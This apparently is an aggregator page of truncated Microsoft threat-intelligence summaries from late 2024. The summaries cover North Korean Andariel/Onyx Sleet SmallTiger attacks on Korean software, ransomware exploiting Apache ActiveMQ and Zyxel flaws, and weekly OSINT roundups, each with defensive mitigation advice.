What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2024-12-30 19:16:07 | Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) (lien direct) | ## Snapshot ASEC reports that the Andariel threat group has resumed attacks to distribute SmallTiger malware, targeting Korean software solutions, including asset management and document management tools. ## Description ASEC reports that the Andariel group (tracked by Microsoft as [Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)) exploits vulnerabilities in asset management solutions to gain control over systems. Most of these attacks resulted in the installation of ModeLoader. In one case, the attackers used [brute-force](https://security.microsoft.com/threatanalytics3/d44f2c6d-6901-4967-82b7-7ffe4f7276e7/overview) and dictionary attacks on exposed update servers to replace update programs with malicious versions, enabling them to distribute SmallTiger. In recent cases, researchers have found SmallTiger in the installation paths of asset management solutions alongside a keylogger. This keylogger stored captured keystrokes in the temporary file "MsMpLog.tmp." The attackers also configured infected systems for future Remote Desktop Protocol (RDP) access. Additionally, they deployed an open-source tool called CreateHiddenAccount to add and conceal a backdoor account. The threat group also targets document management solutions by exploiting outdated Apache Tomcat web servers. After gaining initial access, they query system information and install an Advanced Port Scanner. They then install a web shell via PowerShell commands with the download server also identified as the command-and-control server address for SmallTiger. ## Microsoft Analysis and Additional OSINT Context [Microsoft researchers determined](https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/) that SmallTiger is a C++ backdoor with layered obfuscation, encountered in the wild as a Themida or VMProtect packed executable. [In February 2024](https://asec.ahnlab.com/ko/73907/), ASEC first identified SmallTiger targeting South Korean defense and manufacturing organizations. Subsequently, in May 2024, Microsoft observed Onyx Sleet conducting attacks using SmallTiger, specifically targeting South Korean defense organizations. Onyx Sleet is a North Korea-affiliated activity group that conducts cyber espionage through numerous campaigns with the goal of intelligence gathering and financial gain. The threat actor utilizes a wide range of custom tools and malware, while maintaining a consistent attack chain approach, especially to organizations of interest to North Korean intelligence, such as those in the defense, engineering, and energy sectors. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Maintain good [cyber hygiene](https://www.microsoft.com/en-us/microsoft-365-life-hacks/privacy-and-safety/cyber-hygiene) and follow online safety best practices to help prevent keylogging. - Install antivirus software. Many antivirus software options now include anti-keylogger and anti-spyware protection. This software can help you identify and avoid keylogging malware. Installing and keeping antivirus software up to date helps prevents data theft. - Regularly update security settings, and if a device is no longer receiving updates, strongly consider replacing it with a new device. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Avoid downloading files from unsafe websites or clicking links in an email from an unknown sender. Phishing has become more sophisticated, so you should be cautious of clicking links or downloading attachments from peopl | Malware Tool Vulnerability Threat | APT 45 | ★★ |
|
2024-12-09 12:22:03 | Weekly OSINT Highlights, 9 December 2024 (lien direct) | ## Snapshot Last week\'s OSINT reporting highlights a diverse range of cyber threats spanning ransomware, espionage, supply chain attacks, and disinformation campaigns. Espionage activity remains prominent, with Chinese and Russian actors targeting organizations for geopolitical and industrial intelligence. Key trends include the exploitation of vulnerabilities in widely used software, such as Apache ActiveMQ (CVE-2023-46604) and Docker APIs, and advanced malware like SmokeLoader and MOONSHINE to target industries ranging from manufacturing to financial services. Ransomware groups, including Howling Scorpius and Venom Spider, leverage sophisticated techniques like double extortion and hybrid encryption, focusing on SMBs and enterprises. Targets span global industries, including sensitive infrastructure, while attack vectors predominantly involve phishing, misconfigured systems, and supply chain manipulation, underscoring the adaptability and persistence of modern threat actors. ## Description 1. [Manufacturing Sector Cyberattack](https://sip.security.microsoft.com/intel-explorer/articles/d976ecc3): Cyble Research and Intelligence Labs uncovered a campaign targeting the manufacturing sector with malicious LNK files masquerading as PDFs. The attack employs LOLBins, DLL sideloading, and advanced obfuscation techniques, using tools like Lumma stealer and Amadey bot to exfiltrate data and establish persistence. 1. [Phishing Malware Impersonating the National Tax Service (NTS)](https://sip.security.microsoft.com/intel-explorer/articles/6542e5a4): AhnLab has observed a significant increase in phishing emails impersonating the National Tax Service (NTS), particularly during tax filing periods. These phishing attempts involve emails with manipulated sender addresses to appear as if they are from the NTS, and they contain malicious attachments in various formats or hyperlinks leading to malware-hosting websites and the ultimate deployment of XWorm malware. 1. [Solana Web3.js library backdoored to steal secret, private keys](https://sip.security.microsoft.com/intel-explorer/articles/04dd6cf6): Socket security firm reported that versions 1.95.6 and 1.95.7 of the Solana Web3.js library contained code designed to exfiltrate private and secret keys, which could allow attackers to drain funds from wallets. The attack is believed to be the result of a social engineering/phishing attack targeting maintainers of the official Web3.js open-source library maintained by Solana. 1. [Exploitation of CVE-2023-46604 in Korea](https://sip.security.microsoft.com/intel-explorer/articles/ccb7bd15): AhnLab identified active exploitation of Apache ActiveMQ vulnerability CVE-2023-46604, enabling remote code execution on unpatched Korean systems. Threat actors, including Andariel and Mauri ransomware groups, used tools like Quasar RAT and AnyDesk to exfiltrate data and control compromised environments. 1. [China-Linked Espionage on U.S.-China Organization](https://sip.security.microsoft.com/intel-explorer/articles/9c09d15e): Symantec reported a four-month-long intrusion by suspected Chinese threat actors targeting a U.S. organization with a Chinese presence. The attackers used DLL sideloading, Impacket, and credential-dumping tactics to exfiltrate data, leveraging tools like FileZilla and PSCP for intelligence gathering. 1. [Earth Minotaur\'s MOONSHINE Campaign](https://sip.security.microsoft.com/intel-explorer/articles/699406a4): Trend Micro detailed Earth Minotaur\'s use of the MOONSHINE exploit kit to target vulnerabilities in Android apps like WeChat, delivering the DarkNimbus backdoor. The campaign, likely linked to Chinese actors, focuses on Uyghur and Tibetan communities, employing phishing and Chromium browser exploits to monitor devices. 1. [Vulnerabilities in RAG Systems](https://sip.security.microsoft.com/intel-explorer/articles/53083f3e): Trend Micro exposed critical vulnerabilities in Retrieval-Augmented Generation (RAG) systems, including vector stores and LLM hosting platforms like l | Ransomware Malware Tool Vulnerability Threat Mobile Industrial Prediction | APT 45 | ★★★ |
|
2024-12-06 16:17:50 | Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604) (lien direct) | ## Snapshot Researchers at AhnLab Security intelligence Response Center (ASEC) have identified that the [CVE-2023-46604](https://security.microsoft.com/intel-profiles/CVE-2023-46604) vulnerability in Apache ActiveMQ servers is being exploited on Korean systems. This vulnerability allows remote code execution by manipulating serialized class types in the OpenWire protocol. ## Description The vulnerability began to be actively exploited soon after its disclosure, with incidents linked to the Andariel group and [HelloKitty](https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/) ransomware. The targeting of unpatched systems has been continuous, with attackers deploying tools such as Ladon, Netcat, AnyDesk, and z0Miner to compromise environments. Recently, ASEC has observed evidence that Mauri ransomware threat actors are exploiting CVE-2023-46604, using Quasar RAT as part of the attack chain to exfiltrate information and gain control over systems through remote desktop. While no Mauri ransomware attacks have been confirmed, ASEC notes that Mauri ransomware has been uploaded to the download server. ## Microsoft Analysis and Additional OSINT Context Microsoft Threat Intelligence has identified threat activity exploiting CVE-2023-46604 to facilitate HelloKitty ransomware attacks. The threat actor exploited CVE-2023-46604 to deliver and launch malicious MSI binaries using misexec.exe. The actor then tampered with system services and launched the ransomware. Microsoft has also observed indicators of additional activity targeting ActiveMQ since late October 2023, though the exploitation method was not confirmed. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Due to active attacks in the wild and the availability of exploitation details, organizations should upgrade affected servers immediately. According to Apache, upgrade ActiveMQ servers to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to address this issue. - Review logs and alerts for any indications of exploitation or post-compromise activity on affected servers, such as malicious files dropped and executed via the msiexec.exe command. Upgrading ActiveMQ will not remediate any attacker artifacts. - If evidence of exploitation is discovered, reset the credentials for accounts that have been used on the server, or have logged onto the server. Any service accounts related to ActiveMQ should also have their credentials rotated. - Harden servers by following Apache\'s [ActiveMQ security recommendations](https://activemq.apache.org/security). Enabling authentication for brokers can prevent an attacker from moving laterally to another broker without proper authentication. - Refer to our threat overview on [human-operated ransomwar](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport?ocid=magicti_ta_ta2)e for recommendations on security hardening and monitoring to defend against ransomware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Run Endpoint Detection and Response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-b | Ransomware Tool Vulnerability Threat | APT 45 | ★★ |
|
2024-11-22 21:45:45 | Helldown Ransomware: An Overview of this Emerging Threat (lien direct) | ## Snapshot Researchers at Sekoia have reported with medium confidence that the \'Helldown\' ransomware operation is exploiting vulnerabilities in Zyxel firewalls to infiltrate corporate networks. ## Description Helldown, which was first documented in August 2024, has been growing rapidly, listing numerous victims on its data extortion portal. The ransomware has a Linux variant that targets VMware files, with capabilities to list and kill VMs to encrypt images, though it appears to be under development. Helldown for Windows is believed to be based on the leaked LockBit 3 builder and shows operational similarities to Darkrace and Donex, but no definitive connection has been established. Helldown is not particularly selective in the data it steals, publishing large data packs on its website, with one instance reaching up to 431GB. The ransomware uses a random victim string as the extension for encrypted files and includes this string in the ransom note\'s filename. Sekoia\'s investigation suggests that Helldown may be using CVE-2024-42057, a command injection vulnerability in Zyxel firewalls\' IPSec VPN, to execute OS commands and establish a foothold in networks. The attackers reportedly use a malicious account to access domain controllers, move laterally, and disable endpoint defenses. Payloads connected to the Zyxel compromise were uploaded to VirusTotal from Russia, indicating the possibility of private n-day exploit usage. As of the latest reports, 31 victims have been listed on Helldown\'s extortion portal, primarily small and medium-sized firms in the United States and Europe. ## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. Apply new security patches as soon as possible. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used by Onyx Sleet: - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-a | Ransomware Malware Tool Vulnerability Threat | APT 45 | ★★ |
|
2024-10-07 16:54:11 | Faits saillants hebdomadaires OSINT, 7 octobre 2024 Weekly OSINT Highlights, 7 October 2024 (lien direct) |
## Snapshot Last week\'s OSINT reporting highlights diverse and sophisticated attack tactics, primarily focusing on nation-state actors, cybercriminal groups, and advanced malware campaigns. Common attack vectors include spear-phishing, exploiting vulnerabilities (such as CVEs in Linux servers and AI infrastructure), and malware delivered through fileless methods. The malware ranges from Joker\'s subscription fraud (targeting mobile devices) to more complex backdoors like WarmCookie, which allows system profiling and further malware deployment. North Korean APT groups (APT37 and Stonefly) remain active, targeting Southeast Asia and United States companies, while Iranian actors focus on political campaigns. Financially motivated attacks are also prominent, with ransomware groups like Meow and attackers using MedusaLocker deploying advanced techniques for exfiltration and encryption. Cloud environments and AI infrastructure, including generative models like AWS Bedrock, have emerged as critical targets, exposing new vulnerabilities for resource hijacking and illicit services. ## Description 1. [Golden Chickens\' More_Eggs](https://sip.security.microsoft.com/intel-explorer/articles/4cb94d70): Trend Micro discovered the use of the more\_eggs backdoor in spear-phishing attacks, targeting various industries. Recent campaigns involved advanced social engineering, and while attribution remains unclear, there are possible ties to FIN6 (Storm-0538). 2. [Linux Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/68e49ad7): Elastic Security Labs uncovered a Linux malware campaign using KAIJI for DDoS attacks and RUDEDEVIL for cryptocurrency mining. The attackers exploited Apache2 vulnerabilities and used Telegram bots for communication and persistence. 3. [Rhadamanthys Malware Updates](https://sip.security.microsoft.com/intel-explorer/articles/c9ea8588): Recorded Future reported on the evolving Rhadamanthys information-stealing malware, now incorporating AI-driven OCR for cryptocurrency theft. It targets systems in North and South America, leveraging encryption and advanced defense evasion techniques. 4. [NVIDIA Container Toolkit Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a35e980e): Wiz Research discovered a critical vulnerability (CVE-2024-0132) in the NVIDIA Container Toolkit, exposing cloud and AI environments to container escape attacks. This flaw could lead to unauthorized control over host systems and data exfiltration. 5. [K4Spreader and PwnRig Campaign](https://sip.security.microsoft.com/intel-explorer/articles/416b07c0): Sekoia TDR linked a campaign exploiting WebLogic vulnerabilities to the 8220 Gang, deploying the K4Spreader malware and PwnRig cryptominer. The attackers primarily target cloud environments for Monero mining, exploiting both Linux and Windows systems. 6. [Nitrogen Malware Incident](https://sip.security.microsoft.com/intel-explorer/articles/d0473059): The DFIR Report analyzed an attack using Nitrogen malware delivered through a malicious Advanced IP Scanner installer. The threat actor used Sliver and Cobalt Strike beacons, eventually deploying BlackCat ransomware across the victim\'s network. 7. [Gorilla Botnet\'s DDoS Attacks](https://sip.security.microsoft.com/intel-explorer/articles/0bcef023): NSFOCUS identified the Gorilla Botnet, a Mirai variant, launching over 300,000 DDoS attacks. Its primary targets were U.S., Chinese, and global sectors, including government and telecom, using advanced encryption techniques for stealth. 8. [Iranian IRGC Cyber Activity](https://sip.security.microsoft.com/intel-explorer/articles/42850d7b): The FBI and UK\'s NCSC warned about Iranian IRGC-affiliated actors targeting individuals related to Middle Eastern affairs. Using social engineering, they focused on stealing credentials and influencing U.S. political campaigns. 9. [Critical Infrastructure Reconnaissance](https://sip.security.microsoft.com/intel-explorer/articles/d491ff08): Dragos detected a campaign targeting North Ame | Ransomware Malware Tool Vulnerability Threat Mobile Prediction Cloud | APT 37 APT 45 | ★★ |
1
We have: 5 articles.
We have: 5 articles.
To see everything:
Our RSS (filtrered)
